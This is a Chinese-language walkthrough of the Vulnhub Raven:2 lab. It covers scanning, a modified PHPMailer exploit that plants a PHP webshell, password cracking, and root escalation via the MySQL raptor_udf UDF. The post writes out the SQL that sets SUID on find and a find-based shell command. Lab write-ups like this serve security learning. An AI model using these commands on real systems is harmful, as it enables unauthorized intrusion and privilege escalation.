mysql靶机_[Vulnhub]靶机渗透-Raven:2

0x01 Scan Host

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第1张图片

更加详细地扫描:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第2张图片

0x02 Web Service

还是有个wp,老规矩用wpscan看一下,同时扫描目录。

flag1

dirb扫描出错,所以这里用gobuster:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第3张图片

挨个看了下发现了flag1:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第4张图片

刚好wpscan的结果也出来了,wordpress的版本是4.8.7,主题twentyseven 2.2,大概看了没有什么可利用的洞。

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第5张图片

再仔细看一下当时扫出的目录,发现有PHPMailer,VERSION:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第6张图片

看一下有没有Nday:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第7张图片

选择了40974.py这个POC,做了修改:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第8张图片

首先payload改成了一句话木马,然后target注意contact.php是目标发送email的页面,也是PHPMailer存在漏洞的地方,再一个就是注意第三个框的路径.访问contact.php生成shell:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第9张图片

然后wordpress的后台密码爆破失败。

0x03 SSH Service

使用hydra爆破没出,包括常规字典以及社会工程学字典。

0x04 Privilege Escalation

Linux Raven 3.16.0-6-amd64 #1 SMP Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第10张图片

没看到SUID以及sudo可以利用的东西。

flag2&&flag3

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第11张图片

还少个flag2,刚才命令查找的目录路径不全面:

find / -name "flag*"

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第12张图片

现在提权没有头绪,想想还有mysql没有看,看到wp的配置文件是root:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第13张图片

AntSword导出是csv,所以我们自己导出:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第14张图片

导出后修改为user:pass的格式,然后用john跑一下HASH,还是用rockyou字典。

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第15张图片

Steven的密码是跑出来了,但是没能成功登陆SSH.

mysql-CVE-2016-6662

这样就很头疼了,最后还剩mysql:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第16张图片

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第17张图片

注意…我不小心是mv出来的,尽量cp吧,然后编译一下再编译成动态链接库。

use mysql;

create table foo(line blob);

insert into foo values(load_file('/var/www/html/raptor_udf.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';

create function do_system returns integer soname 'raptor_udf.so';

select * from mysql.func;

select do_system('chmod u+s /usr/bin/find');

其实就是利用这个动态链接库来创建一个自定义函数来执行命令,给find SUID权限,然后利用find提权:

find / -exec "/bin/sh" \;

flag4

但是我这里没交互式shell,用msf直接整个payload丢上去反弹也行,用我之前说过的nc没有-e参数的方法也行。我嫌麻烦就不弄了:

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第18张图片

直接读flag吧,但是建议各位还是走完提权的流程最好。

mysql靶机_[Vulnhub]靶机渗透-Raven:2_第19张图片

你可能感兴趣的:(mysql靶机)